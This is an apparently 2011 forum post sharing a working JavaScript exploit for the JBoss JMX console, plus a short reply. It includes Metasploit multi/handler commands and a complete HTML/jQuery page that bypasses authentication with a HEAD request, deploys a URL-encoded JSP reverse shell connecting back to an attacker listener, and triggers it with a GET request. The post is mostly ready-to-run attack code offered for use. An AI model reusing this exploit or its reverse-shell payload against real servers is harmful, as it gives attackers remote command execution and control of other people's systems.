JBoss JMX Deploy Exploit
euronymous — 4 May, 2011 - 16:12
Just finished to port the JBoss JMX Deploy Exploit, originally coded in Ruby by l33tb0y to Javascript.
It's working pretty nice, and bypass authentication via HEAD request.
I've also added it to BeEF, take a look at it here: http://code.google.com/p/beef/source/detail?r=951
Before launching it, both this or the BeEF version, remember to fire your Metasploit multi/handler:
Here is the plain Javascript version, using jQuery to issue XHRs:
It's working pretty nice, and bypass authentication via HEAD request.
I've also added it to BeEF, take a look at it here: http://code.google.com/p/beef/source/detail?r=951
Before launching it, both this or the BeEF version, remember to fire your Metasploit multi/handler:
msf > use exploit/multi/handler msf exploit(handler) > set payload java/jsp_shell_reverse_tcp payload => java/jsp_shell_reverse_tcp msf exploit(handler) > set lhost 192.168.1.2 lhost => 192.168.1.2 msf exploit(handler) > set lport 6666 lport => 6666 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.2:6666 [*] Starting the payload handler...
Here is the plain Javascript version, using jQuery to issue XHRs:
<html>
<head>
<script src="./jquery-1.5.2.min.js" type="text/javascript"> </script>
</head>
<body>
<h1>Jboss 6.0.0M1 JMX Deploy Exploit</h1>
<br>author: Michele "antisnatchor" Orru'
<!--
* Jboss 6.0.0M1 JMX Upload Exploit
* Should also work on Jboss 5.1.0 and 4.x versions
*
* Ported from l33tb0y Ruby code in Javascript by antisnatchor.
* HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler
*
* Please note that this is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell
-->
<div class="output"> </div>
<script type="text/javascript">
function randomString(len, charSet) {
charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var randomString = '';
for (var i = 0; i < len; i++) {
var randomPoz = Math.floor(Math.random() * charSet.length);
randomString += charSet.substring(randomPoz,randomPoz+1);
}
return randomString;
}
// Metasploit multi/hanlder listener
var rhost = "127.0.0.1"; //target host
var rport = "8080"; //target port
var lhost = "192.168.1.2"; //MSF handler listener host
var lport = "6666"; //MSF handler listener port
var command = "cmd.exe"; // command to be executed by Runtime.getRuntime().exec()
//Runtime.getRuntime().exec() --> with cmd.exe
var payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + command + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E";
var randomJspName = randomString(10);
var uri = "/jmx-console/HtmlAdaptor;index.jsp?" + "action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + randomJspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
$('.output').html("<br>[+] Sending HEAD request sent to Jboss<br>");
$.ajax({
type: 'HEAD',
url: 'http://' + rhost + ':' + rport + uri,
dataType: 'script',
success: function(data, textStatus, xhr){
$('.output').append("<br>[+] Now Sleeping for 10 secs before activating the reverse payload <br>");
function triggerReverseConn(){
$('.output').append("<br>[+] Sending GET request to [http://" + rhost + ":" + rport + "/web-console/" + randomJspName + ".jsp" + " <br>");
$.ajax({
type: 'GET',
url: 'http://' + rhost + ':' + rport +"/web-console/" + randomJspName + ".jsp",
dataType: 'script',
success: function(data, textStatus, xhr){
$('.output').append("<br>[+] OK: Reverse JSP shell should have been triggered. Check your MSF handler listener. <br>");
},
error: function(jqXHR, textStatus, errorThrown){
$('.output').append("<br>[+] ERROR: second GET request failed. <br>");
}
});
}
//sleep 10 secs
setTimeout(triggerReverseConn,10000);
},
error: function(jqXHR, textStatus, errorThrown){
$('.output').append("<br>[+] ERROR: first HEAD request failed.");
}
});
</script>
</body>
</html>
c00l
Anonymous — 5 May, 2011 - 16:16c00l